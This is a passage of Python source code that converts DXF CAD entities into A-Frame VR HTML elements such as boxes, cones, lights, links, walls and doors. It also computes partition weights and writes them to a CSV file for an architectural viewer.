atan2(-Ax_3, Az_3) else: pitch = -pi/2 yaw = -atan2(Az_1, Ax_1) roll = 0 else: pitch = pi/2 yaw = atan2(Az_1, Ax_1) roll = 0 #Y position, mirrored data['20'] = -data['20'] #rotations from radians to degrees data['210'] = degrees(pitch) data['50'] = degrees(yaw) data['220'] = -degrees(roll) elif flag == 'attrib':#stores values for attributes within block if key == '1':#attribute value attr_value = value elif key == '2':#attribute key data[value] = attr_value flag = 'block'#restore block modality if key == '0': invisible = False#by default layer is visible if flag == 'face':#close 3D face data['2'] = '3dface' #is material set in model? try: material = material_gallery.get(layer = data['8']) data['color'] = material.color invisible = material.invisible#layer visibility except: data['color'] = layer_color[data['8']] data['8'] = 'default' if invisible: flag = False else: data['num'] = x output[x] = data if data['12']!=data['13'] or data['22']!=data['23'] or data['32']!=data['33']: data2 = data.copy() data2['11'] = data['12'] data2['21'] = data['22'] data2['31'] = data['32'] data2['12'] = data['13'] data2['22'] = data['23'] data2['32'] = data['33'] x += 1 data2['num'] = x output[x] = data2 flag = False elif value == 'ATTRIB':#start attribute within block attr_value = '' flag = 'attrib' elif flag == 'block':#close block #material images are patterns? is material set in model? try: material = material_gallery.get(layer = data['8']) data['color'] = material.color invisible = material.invisible#layer visibility if material.pattern:# == True data['repeat']=True except: data['color'] = layer_color[data['8']] data['8'] = 'default' if invisible: flag = False else: data['num'] = x output[x] = data flag = False if value == '3DFACE':#start 3D face data = {}#default values flag = 'face' x += 1 elif value == 'INSERT':#start block data = {'41': 1, '42': 1, '43': 1, '50': 0, '210': 0, '220': 0, '230': 1,'repeat': False, 'type': '','animation': False}#default values flag = 'block' x += 1 return output def make_html(page_obj, collection, partitions, finishings, csv_f): output = {} for x, data in collection.items(): if data['2'] == '3dface': output[x] = make_triangle(page_obj, x, data) if data['2'] == '6planes':#left for legacy output[x] = make_box(page_obj, x, data) elif data['2'] == 'box' or data['2'] == 'a-box': output[x] = make_box(page_obj, x, data) elif data['2'] == 'cylinder' or data['2'] == 'a-cylinder': output[x] = make_cylinder(page_obj, x, data) elif data['2'] == 'a-curvedimage': output[x] = make_curvedimage(x, data) elif data['2'] == 'cone' or data['2'] == 'a-cone': output[x] = make_cone(page_obj, x, data) elif data['2'] == 'sphere' or data['2'] == 'a-sphere': output[x] = make_sphere(page_obj, x, data) elif data['2'] == 'circle' or data['2'] == 'a-circle': output[x] = make_circle(page_obj, x, data) elif data['2'] == 'plane' or data['2'] == 'a-plane' or data['2'] == 'look-at': output[x] = make_plane(page_obj, x, data) elif data['2'] == 'floor':#left for legacy data['210'] = data['210'] - 90 output[x] = make_plane(page_obj, x, data) elif data['2'] == 'ceiling':#left for legacy data['210'] = data['210'] + 90 output[x] = make_plane(page_obj, x, data) elif data['2'] == 'light' or data['2'] == 'a-light': output[x] = make_light(page_obj, x, data) elif data['2'] == 'a-text': output[x] = make_text(x, data) elif data['2'] == 'a-link': output[x] = make_link(page_obj, x, data) elif data['2'] == 'a-door': door = AOpening(page_obj, data, partitions, finishings, csv_f) if door.type_obj: door.has_type()#changes 
colors and writes to csv else: door.no_type()#writes to csv if door.finish_obj: door.has_finishing()#changes colors again if door.d['alert'] == 'None': output[x] = door.write_html() else:#by now useless, if is always true pass #output[x] = door.write_html_alert() elif data['2'] == 'a-furniture': furn = AFurniture(page_obj, data, finishings) if furn.finish_obj: furn.has_finishing()#changes colors output[x] = furn.write_html() elif data['2'] == 'a-wall' or data['2'] == 'a-slab' or data['2'] == 'a-openwall': part = APartition(page_obj, data, partitions, finishings, csv_f) if part.type_obj: part.calc_weight() else: part.no_weight() #here we could add the has_finishing, as in AOpening if part.d['alert'] == 'None': output[x] = part.write_html() else: output[x] = part.write_html_alert() return output def reference_openings(collection): collection2 = collection.copy() for x, data in collection.items(): if data['2'] == 'a-door': collection[x] = data for x2, data2 in collection2.items(): if data2['2'] == 'a-wall': if data['210']==0 and data['220']==0 and data2['210']==0 and data2['220']==0: data2 = door_straight_case(x, data, data2) else: data2 = door_tilted_case(x, data, data2) collection[x2] = data2 return collection def reference_animations(collection):#TODO collection2 = collection.copy() for x, data in collection.items(): if data['2'] == 'a-animation': collection[x] = data for x2, data2 in collection2.items(): if data2['2'] != '3dface' or data2['2'] != 'a-wall' or data2['2'] != 'a-openwall' or data2['2'] != 'a-door': if data['10']==data2['10'] and data['20']==data2['20'] and data['30']==data2['30']: data2['animation'] = True data2['ATTRIBUTE'] = data['ATTRIBUTE'] data2['FROM'] = data['FROM'] data2['TO'] = data['TO'] data2['BEGIN'] = data['BEGIN'] data2['DIRECTION'] = data['DIRECTION'] data2['REPEAT'] = data['REPEAT'] data2['DURATION'] = data['DURATION'] collection[x2] = data2 return collection def door_straight_case(x, data, data2): if data['30']==data2['30'] and data['43']>0 and data2['43']>0: rotd = round(data['50'], 0) rotw = round(data2['50'], 0) if rotd==rotw-180 or rotd-180==rotw: backwards = -1 else: backwards = 1 if rotd == rotw or backwards == -1: #translation xt = data['10']-data2['10'] zt = data['20']-data2['20'] #rotation alfa = radians(data2['50']) xd = round(xt*cos(alfa)-zt*sin(alfa), 4) zd = round(xt*sin(alfa)+zt*cos(alfa), 4) xde = xd + round(data['41'], 4)*backwards zde = zd + round(data['42'], 4) #wall bounding box if data2['41'] > 0: xmaxw = round(data2['41'], 4) xminw = 0 else: xmaxw = 0 xminw = round(data2['41'], 4) if data2['42'] > 0: zmaxw = 0 zminw = -round(data2['42'], 4) else: zmaxw = -round(data2['42'], 4) zminw = 0 #door bounding box if xde > xd: xmaxd = xde xmind = xd else: xmaxd = xd xmind = xde if zde > zd: zmaxd = zde * ( - backwards) zmind = zd * ( - backwards) else: zmaxd = zd * ( - backwards) zmind = zde * ( - backwards) #door inclusion if xmaxw >= xmaxd and xminw <= xmind and zmaxw >= zmaxd and zminw <= zmind: data2['door'] = x data2['2'] = 'a-openwall' if data['43']>data2['43']: data2['door_height'] = data2['43'] else: data2['door_height'] = data['43'] if data2['41']>0: data2['door_off_1'] = xmind data2['door_off_2'] = xmaxd else: data2['door_off_1'] = xmaxd - xmaxw data2['door_off_2'] = xmind - xmaxw return data2 #TODO def door_tilted_case(x, data, data2): #d210 = round(data['210']*fabs(data['41'])/data['41'], 4) #d220 = round(data['220']*fabs(data['42'])/data['42'], 4) #d50 = round(data['50']*fabs(data['43'])/data['43'], 4) #w210 = 
round(data2['210']*fabs(data2['41'])/data2['41'], 4) #w220 = round(data2['220']*fabs(data2['42'])/data2['42'], 4) #w50 = round(data2['50']*fabs(data2['43'])/data2['43'], 4) return data2 #returns repeat image values def is_repeat(repeat, rx, ry): if repeat: output = f'; repeat:{fabs(rx)} {fabs(ry)}' return output else: return ';' #returns positive/negative scaling def unit(nounit): unit = fabs(nounit)/nounit return unit def make_box(page_obj, x, data): outstr = f'<a-entity id="box-{x}-ent" \n' if page_obj.shadows: outstr += 'shadow="receive: true; cast: true" \n' outstr += f'position="{data["10"]} {data["30"]} {data["20"]}" \n' outstr += f'rotation="{data["210"]} {data["50"]} {data["220"]}">\n' outstr += f'<a-box id="box-{x}" \n' outstr += f'position="{data["41"]/2} {data["43"]/2} {-data["42"]/2}" \n' outstr += f'scale="{fabs(data["41"])} {fabs(data["43"])} {fabs(data["42"])}" \n' outstr += 'geometry="' try: if data['segments-depth']!='1': outstr += f'segments-depth: {data["segments-depth"]};' if data['segments-height']!='1': outstr += f'segments-height: {data["segments-height"]};' if data['segments-width']!='1': outstr += f'segments-width: {data["segments-width"]};' outstr += '" \n' except KeyError: outstr += '" \n' outstr += f'material="src: #image-{data["8"]}; color: {data["color"]}' outstr += is_repeat(data["repeat"], data["41"], data["43"]) outstr += '">\n' if data['animation']: outstr += is_animation(data) outstr += '</a-box>\n</a-entity>\n' return outstr def is_animation(data): outstr = f'<a-animation attribute="{data["ATTRIBUTE"]}"\n' outstr += f'from="{data["FROM"]}"\n' outstr += f'to="{data["TO"]}"\n' outstr += f'begin="{data["BEGIN"]}"\n' outstr += f'direction="{data["DIRECTION"]}"\n' outstr += f'repeat="{data["REPEAT"]}"\n' outstr += f'duration="{data["DURATION"]}"\n' outstr += '></a-animation>\n' return outstr def make_cone(page_obj, x, data): outstr = f'<a-entity id="cone-{x}-ent" \n' if page_obj.shadows: outstr += 'shadow="receive: true; cast: true" \n' outstr += f'position="{data["10"]} {data["30"]} {data["20"]}" \n' outstr += f'rotation="{data["210"]} {data["50"]} {data["220"]}">\n' outstr += f'<a-cone id="cone-{x}" \n' outstr += f'position="0 {data["43"]/2} 0" \n' if float(data['43']) < 0: outstr += 'rotation="180 0 0">\n' outstr += f'scale="{fabs(data["41"])} {fabs(data["43"])} {fabs(data["42"])}" \n' outstr += 'geometry="' try: if data['open-ended']!='false': outstr += 'open-ended: true;' if data['radius-top']!='0': outstr += f'radius-top: {data["radius-top"]};' if data['segments-height']!='18': outstr += f'segments-height: {data["segments-height"]};' if data['segments-radial']!='36': outstr += f'segments-radial: {data["segments-radial"]};' if data['theta-length']!='360': outstr += f'theta-length: {data["theta-length"]};' if data['theta-start']!='0': outstr += f'theta-start: {data["theta-start"]};' outstr += '" \n' except KeyError: outstr += '" \n' outstr += f'material="src: #image-{data["8"]}; color: {data["color"]}' outstr += is_repeat(data["repeat"], data["41"], data["43"]) outstr += '">\n' if data['animation']: outstr += is_animation(data) outstr += '</a-cone>\n</a-entity>\n' return outstr def make_circle(page_obj, x, data): outstr = f'<a-entity id="circle-{x}-ent" \n' if page_obj.shadows: outstr += 'shadow="receive: true; cast: true" \n' outstr += f'position="{data["10"]} {data["30"]} {data["20"]}" \n' outstr += f'rotation="{data["210"]} {data["50"]} {data["220"]}">\n' outstr += f'<a-circle id="circle-{x}" \n' if data['2'] == 'circle': outstr += f'rotation="-90 0 
0"\n' outstr += f'radius="{fabs(data["41"])}" \n' outstr += 'geometry="' try: if data['segments']!='32': outstr += f'segments: {data["segments"]};' if data['theta-length']!='360': outstr += f'theta-length: {data["theta-length"]};' if data['theta-start']!='0': outstr += f'theta-start: {data["theta-start"]};' outstr += '" \n' except KeyError: outstr += '" \n' outstr += f'material="src: #image-{data["8"]}; color: {data["color"]}' outstr += is_repeat(data["repeat"], data["41"], data["43"]) outstr += '">\n' if data['animation']: outstr += is_animation(data) outstr += '</a-circle>\n</a-entity>\n' return outstr def make_cylinder(page_obj, x, data): outstr = f'<a-entity id="cylinder-{x}-ent" \n' if page_obj.shadows: outstr += 'shadow="receive: true; cast: true" \n' outstr += f'position="{data["10"]} {data["30"]} {data["20"]}" \n' outstr += f'rotation="{data["210"]} {data["50"]} {data["220"]}">\n' outstr += f'<a-cylinder id="cylinder-{x}" \n' outstr += f'position="0 {data["43"]/2} 0" \n' if float(data['43']) < 0: outstr += 'rotation="180 0 0">\n' outstr += f'scale="{fabs(data["41"])} {fabs(data["43"])} {fabs(data["42"])}" \n' outstr += 'geometry="' try: if data['open-ended']!='false': outstr += 'open-ended: true;' if data['radius-top']!='0': outstr += f'radius-top: {data["radius-top"]};' if data['segments-height']!='18': outstr += f'segments-height: {data["segments-height"]};' if data['segments-radial']!='36': outstr += f'segments-radial: {data["segments-radial"]};' if data['theta-length']!='360': outstr += f'theta-length: {data["theta-length"]};' if data['theta-start']!='0': outstr += f'theta-start: {data["theta-start"]};' outstr += '" \n' except KeyError: outstr += '" \n' outstr += f'material="src: #image-{data["8"]}; color: {data["color"]}' outstr += is_repeat(data["repeat"], data["41"], data["43"]) outstr += '">\n' if data['animation']: outstr += is_animation(data) outstr += '</a-cylinder>\n</a-entity>\n' return outstr def make_curvedimage(x, data): outstr = f'<a-entity id="curvedimage-{x}-ent" \n' outstr += 'shadow="receive: false; cast: false" \n' outstr += f'position="{data["10"]} {data["30"]} {data["20"]}" \n' outstr += f'rotation="{data["210"]} {data["50"]} {data["220"]}">\n' outstr += f'<a-curvedimage id="curvedimage-{x}" \n' outstr += f'position="0 {data["43"]/2} 0" \n' if float(data['43']) < 0: outstr += 'rotation="180 0 0">\n' outstr += f'scale="{fabs(data["41"])} {fabs(data["43"])} {fabs(data["42"])}" \n' try: if data['theta-length']!='270': outstr += f'theta-length="{data["theta-length"]}" ' if data['theta-start']!='0': outstr += f'theta-start="{data["theta-start"]}" ' except KeyError: pass outstr += f'src="#image-{data["8"]}">\n' if data['animation']: outstr += is_animation(data) outstr += '</a-curvedimage>\n</a-entity>\n' return outstr def make_sphere(page_obj, x, data): outstr = f'<a-entity id="sphere-{x}-ent" \n' if page_obj.shadows: outstr += 'shadow="receive: true; cast: true" \n' outstr += f'position="{data["10"]} {data["30"]} {data["20"]}" \n' outstr += f'rotation="{data["210"]} {data["50"]} {data["220"]}">\n' outstr += f'<a-sphere id="sphere-{x}" \n' outstr += f'position="0 {data["43"]} 0" \n' if float(data['43']) < 0: outstr += 'rotation="180 0 0">\n' outstr += f'scale="{fabs(data["41"])} {fabs(data["43"])} {fabs(data["42"])}" \n' outstr += 'geometry="' try: if data['phi-length']!='360': outstr += f'phi-length: {data["phi-length"]};' if data['phi-start']!='0': outstr += f'phi-start: {data["phi-start"]};' if data['segments-height']!='18': outstr += f'segments-height: 
{data["segments-height"]};' if data['segments-width']!='36': outstr += f'segments-width: {data["segments-width"]};' if data['theta-length']!='180': outstr += f'theta-length: {data["theta-length"]};' if data['theta-start']!='0': outstr += f'theta-start: {data["theta-start"]};' outstr += '" \n' except KeyError: outstr += '" \n' outstr += f'material="src: #image-{data["8"]}; color: {data["color"]}' outstr += is_repeat(data["repeat"], data["41"], data["43"]) outstr += '">\n' if data['animation']: outstr += is_animation(data) outstr += '</a-sphere>\n</a-entity>\n' return outstr def make_plane(page_obj, x, data): outstr = f'<a-entity id="plane-{x}-ent" \n' if page_obj.shadows: outstr += 'shadow="receive: true; cast: true" \n' outstr += f'position="{data["10"]} {data["30"]} {data["20"]}" \n' outstr += f'rotation="{data["210"]} {data["50"]} {data["220"]}">\n' outstr += f'<a-plane id="plane-{x}" \n' if data['2'] == 'look-at':#if it's a look at, it is centered and looks at the camera foot outstr += f'position="0 {data["43"]/2} 0" \n' outstr += 'look-at="#camera-foot" \n' elif data['2'] == 'ceiling':#if it's a ceiling, correct position outstr += f'position="{data["41"]/2} {-data["43"]/2} 0" \n' else:#insertion is at corner outstr += f'position="{data["41"]/2} {data["43"]/2} 0" \n' outstr += f'width="{fabs(data["41"])}" height="{fabs(data["43"])}" \n' outstr += 'geometry="' try: if data['segments-height']!='1': outstr += f'segments-height: {data["segments-height"]};' if data['segments-width']!='1': outstr += f'segments-width: {data["segments-width"]};' outstr += '" \n' except KeyError: outstr += '" \n' outstr += f'material="src: #image-{data["8"]}; color: {data["color"]}' outstr += is_repeat(data["repeat"], data["41"], data["43"]) outstr += '">\n' if data['animation']: outstr += is_animation(data) outstr += '</a-plane>\n</a-entity>\n' return outstr def make_text(x, data): outstr = f'<a-entity id="text-{x}" \n' outstr += f'position="{data["10"]} {data["30"]} {data["20"]}" \n' outstr += f'rotation="{data["210"]} {data["50"]} {data["220"]}"\n' outstr += f'text="width: {data["41"]}; align: {data["align"]}; color: {data["color"]}; ' outstr += f'value: {data["text"]}; wrap-count: {data["wrap-count"]}; ' outstr += '">\n' if data['animation']: outstr += is_animation(data) outstr += '</a-entity>\n' return outstr def make_link(page_obj, x, data): outstr = f'<a-link id="link-{x}" \n' outstr += f'position="{data["10"]} {data["30"]} {data["20"]}" \n' outstr += f'rotation="{data["210"]} {data["50"]} {data["220"]}"\n' outstr += f'scale="{data["41"]} {data["43"]} {data["42"]}"\n' if data['tree'] == 'parent': target = page_obj.get_parent() elif data['tree'] == 'child': target = page_obj.get_first_child() elif data['tree'] == 'previous' or data['tree'] == 'prev': target = page_obj.get_prev_sibling() else:#we default to next sibling target = page_obj.get_next_sibling() try: if target: outstr += f'href="{target.url}"\n' outstr += f'title="{data["title"]}" color="{data["color"]}" on="click"\n' eq_image = target.specific.equirectangular_image if eq_image: outstr += f'image="{eq_image.file.url}"' else: outstr += 'image="#default-sky"' outstr += '>\n' if data['animation']: outstr += is_animation(data) outstr += '</a-link>\n' return outstr else: return '' except: return '' def make_triangle(page_obj, x, data): outstr = f'<a-triangle id="triangle-{x}" \n' if page_obj.shadows: outstr += 'shadow="receive: true; cast: true" \n' outstr += f'geometry="vertexA:{data["10"]} {data["30"]} {data["20"]}; \n' outstr += 
f'vertexB:{data["11"]} {data["31"]} {data["21"]}; \n' outstr += f'vertexC:{data["12"]} {data["32"]} {data["22"]}" \n' outstr += f'material="src: #image-{data["8"]}; color: {data["color"]}; ' if page_obj.double_face: outstr += 'side: double; ' outstr += '">\n</a-triangle> \n' return outstr def make_light(page_obj, x, data): outstr = f'<a-entity id="light-{x}" \n' outstr += f'position="{data["10"]} {data["30"]} {data["20"]}" \n' outstr += f'rotation="{data["210"]} {data["50"]} {data["220"]}"\n' try: if data['type'] == 'ambient': outstr += f'light="type: ambient; color: {data["color"]}; intensity: {data["intensity"]}; ' outstr += '">\n' elif data['type'] == 'point': outstr += f'light="type: point; color: {data["color"]}; intensity: {data["intensity"]}; ' outstr += f'decay: {data["decay"]}; distance: {data["distance"]}; ' if page_obj.shadows: outstr += 'castShadow: true; ' outstr += '"> \n' elif data['type'] == 'spot': outstr += f'light="type: spot; color: {data["color"]}; intensity: {data["intensity"]}; ' outstr += f'decay: {data["decay"]}; distance: {data["distance"]}; ' outstr += f'angle: {data["angle"]}; penumbra: {data["penumbra"]}; ' if page_obj.shadows: outstr += 'castShadow: true; ' outstr += f'target: #light-{x}-target;"> \n' outstr += f'<a-entity id="light-{x}-target" position="0 -1 0"> </a-entity> \n' else:#defaults to directional outstr += f'light="type: directional; color: {data["color"]}; intensity: {data["intensity"]}; ' if page_obj.shadows: outstr += 'castShadow: true; ' outstr += f'shadowCameraBottom: {-5*fabs(data["42"])}; \n' outstr += f'shadowCameraLeft: {-5*fabs(data["41"])}; \n' outstr += f'shadowCameraTop: {5*fabs(data["42"])}; \n' outstr += f'shadowCameraRight: {5*fabs(data["41"])}; \n' outstr += f'target: #light-{x}-target;"> \n' outstr += f'<a-entity id="light-{x}-target" position="0 -1 0"> </a-entity> \n' except KeyError:#default if no light type is set outstr += 'light="type: point; intensity: 0.75; distance: 50; decay: 2; ' if page_obj.shadows: outstr += 'castShadow: true;' outstr += '">\n' if data['animation']: outstr += is_animation(data) outstr += '</a-entity>\n'#close light entity return outstr class APartition(object): def __init__(self, page_obj, data, types, finishings, csv_f): self.d = data#is it possible to use the self.__dict__=data construct? 
it would be much cleaner self.page_obj = page_obj.specific self.d['alert'] = 'None' self.type_obj = False if self.d['type']: try: self.type_obj = types.get(title = self.d['type']) except: pass self.finishings = finishings self.csv_f = csv_f def calc_weight(self): part_weight = 0 unit_weight = 0 zero_weight = 0 part_thickness = 0 fixed_thickness = True for part_layer in self.type_obj.part_layers.all(): part_layer_thickness = fabs(float(part_layer.thickness)) part_layer_weight = fabs(float(part_layer.weight)) if part_layer_thickness == 0: fixed_thickness = False zero_weight = part_layer_weight part_thickness += part_layer_thickness unit_weight += part_layer_thickness/100 * part_layer_weight unit_weight += (fabs(self.d['42']) - part_thickness/100) * zero_weight#add eventual zero thickness layer part_weight = unit_weight * fabs(self.d['41']) * fabs(self.d['43'])#actual part size if self.d['2'] == 'a-openwall': part_weight = part_weight - (unit_weight * fabs(self.d['door_off_2']-self.d['door_off_1']) * fabs(self.d['door_height']))#remove door if part_thickness and fixed_thickness and fabs(self.d['42']) != part_thickness/100: self.d['alert'] = 'Different than Partition Type' elif fabs(self.d['42']) < part_thickness/100: self.d['alert'] = 'Partition too thin' else: if self.type_obj.image: self.d['8'] = 'partition-' + self.type_obj.title self.d['repeat'] = self.type_obj.pattern if self.type_obj.color: self.d['color'] = self.type_obj.color #writing to csv file self.csv_f.write(f'{self.d["num"]},{self.d["layer"]},{self.d["2"]},-,-,{self.type_obj.title},{self.d["10"]},{-self.d["20"]},{self.d["30"]},') self.csv_f.write(f'{self.d["210"]},{-self.d["220"]},{self.d["50"]},{self.d["41"]},{self.d["42"]},{self.d["43"]},{part_weight},{self.d["alert"]} \n') return def no_weight(self): #writing to csv file self.csv_f.write(f'{self.d["num"]},{self.d["layer"]},{self.d["2"]},-,-,None,{self.d["10"]},{-self.d["20"]},{self.d["30"]},') self.csv_f.write(f'{self.d["210"]},{-self.d["220"]},{self.d["50"]},{self.d["41"]},{self.d["42"]},{self.d["43"]},0,{self.d["alert"]} \n') return def write_html(self): #start entity outstr = f'<a-entity id="{self.d["2"]}-{self.d["num"]}" \n' if self.page_obj.shadows: outstr += 'shadow="receive: true; cast: true" \n' outstr += f'position="{self.d["10"]} {self.d["30"]} {self.d["20"]}" \n' outstr += f'rotation="{self.d["210"]} {self.d["50"]} {self.d["220"]}">\n' #slab handle is on top if self.d['2'] == 'a-slab': y = self.d['43'] else: y = 0 #top surface if self.d['2'] == 'a-slab': self.d['side'] = 'floor' else: self.d['side'] = 'top' self.d['sub_side'] = self.d['side'] self.d['width'] = fabs(self.d['41']) self.d['height'] = fabs(self.d['42']) outstr += f'<a-entity id="{self.d["2"]}-{self.d["num"]}-{self.d["side"]}-ent" \n' outstr += f'position="{self.d["41"]/2} {self.d["43"]-y} 0" \n' if self.d['43'] > 0: outstr += 'rotation="-90 0 0"> \n' else: outstr += 'rotation="-90 180 0"> \n' outstr += self.part_simple_finishing() outstr += '</a-entity> \n' #bottom surface, a-openwall has left and right bottoms if self.d['2'] == 'a-wall' or self.d['2'] == 'a-slab': if self.d['2'] == 'a-slab': self.d['side'] = 'ceiling' else: self.d['side'] = 'bottom' self.d['sub_side'] = self.d['side'] self.d['width'] = fabs(self.d['41']) self.d['height'] = fabs(self.d['42']) outstr += f'<a-entity id="{self.d["2"]}-{self.d["num"]}-{self.d["side"]}-ent" \n' outstr += f'position="{self.d["41"]/2} {-y} 0" \n' if self.d['43'] > 0: outstr += 'rotation="90 180 0"> \n' else: outstr += 'rotation="90 0 0"> \n' outstr += 
self.part_simple_finishing() outstr += '</a-entity> \n' #inside surface, a-openwall has left, right and top insides if self.d['2'] == 'a-wall' or self.d['2'] == 'a-slab': if self.d['2'] == 'a-slab': self.d['side'] = 'front' else: self.d['side'] = 'in' self.d['sub_side'] = self.d['side'] self.d['width'] = fabs(self.d['41']) self.d['height'] = fabs(self.d['43']) outstr += f'<a-entity id="{self.d["2"]}-{self.d["num"]}-{self.d["side"]}-ent" \n' outstr += f'position="{self.d["41"]/2} {-y} 0" \n' if self.d['42'] < 0: outstr += 'rotation="0 180 0"> \n' else: outstr += '> \n' if self.d['2'] == 'a-slab': outstr += self.part_simple_finishing() else: outstr += self.part_striped_finishing() outstr += '</a-entity> \n' #outside surface, a-openwall has left, right and top outsides if self.d['2'] == 'a-wall' or self.d['2'] == 'a-slab': if self.d['2'] == 'a-slab': self.d['side'] = 'back' else: self.d['side'] = 'out' self.d['sub_side'] = self.d['side'] self.d['width'] = fabs(self.d['41']) self.d['height'] = fabs(self.d['43']) outstr += f'<a-entity id="{self.d["2"]}-{self.d["num"]}-{self.d["side"]}-ent" \n' outstr += f'position="{self.d["41"]/2} {-y} {-self.d["42"]}" \n' if self.d['42'] > 0: outstr += 'rotation="0 180 0"> \n' else: outstr += '> \n' if self.d['2'] == 'a-slab': outstr += self.part_simple_finishing() else: outstr += self.part_striped_finishing() outstr += '</a-entity> \n' #left surface self.d['side'] = 'left' self.d['sub_side'] = 'left' self.d['width'] = fabs(self.d['42']) self.d['height'] = fabs(self.d['43']) outstr += f'<a-entity id="{self.d["2"]}-{self.d["num"]}-{self.d["side"]}-ent" \n' outstr += f'position="0 {-y} {-self.d["42"]/2}" \n' if self.d['41'] > 0: outstr += 'rotation="0 -90 0"> \n' else: outstr += 'rotation="0 90 0"> \n' if self.d['2'] == 'a-slab': outstr += self.part_simple_finishing() else: outstr += self.part_striped_finishing() outstr += '</a-entity> \n' #right surface self.d['side'] = 'right' self.d['sub_side'] = 'right' self.d['width'] = fabs(self.d['42']) self.d['height'] = fabs(self.d['43']) outstr += f'<a-entity id="{self.d["2"]}-{self.d["num"]}-{self.d["side"]}-ent" \n' outstr += f'position="{self.d["41"]} {-y} {-self.d["42"]/2}" \n' if self.d['41'] < 0: outstr += 'rotation="0 -90 0"> \n' else: outstr += 'rotation="0 90 0"> \n' if self.d['2'] == 'a-slab': outstr += self.part_simple_finishing() else: outstr += self.part_striped_finishing() outstr += '</a-entity> \n' if self.d['2'] == 'a-openwall': #bottom left surface self.d['side'] = 'bottom' self.d['sub_side'] = 'bottom-left' self.d['width'] = fabs(self.d['door_off_1']) self.d['height'] = fabs(self.d['42']) outstr += f'<a-entity id="{self.d["2"]}-{self.d["num"]}-{self.d["sub_side"]}-ent" \n' outstr += f'position="{self.d["door_off_1"]/2} 0 0" \n' if self.d['43'] > 0: outstr += 'rotation="90 180 0"> \n' else: outstr += 'rotation="90 0 0"> \n' outstr += self.part_simple_finishing() outstr += '</a-entity> \n' #bottom right surface self.d['side'] = 'bottom' self.d['sub_side'] = 'bottom-right' self.d['width'] = fabs(self.d['41']-self.d['door_off_2']) self.d['height'] = fabs(self.d['42']) outstr += f'<a-entity id="{self.d["2"]}-{self.d["num"]}-{self.d["sub_side"]}-ent" \n' outstr += f'position="{self.d["width"]/2+self.d["door_off_2"]} 0 0" \n' if self.d['43'] > 0: outstr += 'rotation="90 180 0"> \n' else: outstr += 'rotation="90 0 0"> \n' outstr += self.part_simple_finishing() outstr += '</a-entity> \n' #inside left surface self.d['side'] = 'in' self.d['sub_side'] = 'in-left' self.d['width'] = fabs(self.d['door_off_1']) 
self.d['height'] = fabs(self.d['door_height']) outstr += f'<a-entity id="{self.d["2"]}-{self.d["num"]}-{self.d["sub_side"]}-ent" \n' outstr += f'position="{self.d["door_off_1"]/2} 0 0" \n' if self.d['42'] < 0: outstr += 'rotation="0 180 0"> \n' else: outstr += '> \n' outstr += self.part_striped_finishing() outstr += '</a-entity> \n' #inside right surface self.d['side'] = 'in' self.d['sub_side'] = 'in-right' self.d['width'] = fabs(self.d['41']-self.d['door_off_2']) self.d['height'] = fabs(self.d['door_height']) outstr += f'<a-entity id="{self.d["2"]}-{self.d["num"]}-{self.d["sub_side"]}-ent" \n' outstr += f'position="{self.d["width"]/2+self.d["door_off_2"]} 0 0" \n' if self.d['42'] < 0: outstr += 'rotation="0 180 0"> \n' else: outstr += '> \n' outstr += self.part_striped_finishing() outstr += '</a-entity> \n' #inside top surface self.d['side'] = 'in' self.d['sub_side'] = 'in-top' self.d['width'] = fabs(self.d['41']) self.d['height'] = fabs(self.d['43']) outstr += f'<a-entity id="{self.d["2"]}-{self.d["num"]}-{self.d["sub_side"]}-ent" \n' outstr += f'position="{self.d["width"]/2} {self.d["door_height"]} 0" \n' if self.d['42'] < 0: outstr += 'rotation="0 180 0"> \n' else: outstr += '> \n' outstr += self.part_striped_finishing() outstr += '</a-entity> \n' #outside left surface self.d['side'] = 'out' self.d['sub_side'] = 'out-left' self.d['width'] = fabs(self.d['door_off_1']) self.d['height'] = fabs(self.d['door_height']) outstr += f'<a-entity id="{self.d["2"]}-{self.d["num"]}-{self.d["sub_side"]}-ent" \n' outstr += f'position="{self.d["door_off_1"]/2} 0 {-self.d["42"]}" \n' if self.d['42'] > 0: outstr += 'rotation="0 180 0"> \n' else: outstr += '> \n' outstr += self.part_striped_finishing() outstr += '</a-entity> \n' #outside right surface self.d['side'] = 'out' self.d['sub_side'] = 'out-right' self.d['width'] = fabs(self.d['41']-self.d['door_off_2']) self.d['height'] = fabs(self.d['door_height']) outstr += f'<a-entity id="{self.d["2"]}-{self.d["num"]}-{self.d["sub_side"]}-ent" \n' outstr += f'position="{self.d["width"]/2+self.d["door_off_2"]} 0 {-self.d["42"]}" \n' if self.d['42'] > 0: outstr += 'rotation="0 180 0"> \n' else: outstr += '> \n' outstr += self.part_striped_finishing() outstr += '</a-entity> \n' #outside top surface self.d['side'] = 'out' self.d['sub_side'] = 'out-top' self.d['width'] = fabs(self.d['41']) self.d['height'] = fabs(self.d['43']) outstr += f'<a-entity id="{self.d["2"]}-{self.d["num"]}-{self.d["sub_side"]}-ent" \n' outstr += f'position="{self.d["width"]/2} {self.d["door_height"]} {-self.d["42"]}" \n' if self.d['42'] > 0: outstr += 'rotation="0 180 0"> \n' else: outstr += '> \n' outstr += self.part_striped_finishing() outstr += '</a-entity> \n' #end entity outstr += '</a-entity>\n' return outstr def part_simple_finishing(self): try: finishing = self.finishings.get(title = self.d[self.d['side']]) if self.d['side']=="floor": if finishing.skirting_image: part_image = 'skirting-' + finishing.title part_repeat = finishing.skirting_pattern else: part_image = self.d['8'] part_repeat = self.d['repeat'] if finishing.skirting_color: part_color = finishing.skirting_color else: part_color = self.d['color'] else: if finishing.image: part_image = 'finishing-' + finishing.title part_repeat = finishing.pattern else: part_image = self.d['8'] part_repeat = self.d['repeat'] if finishing.color: part_color = finishing.color else: part_color = self.d['color'] 
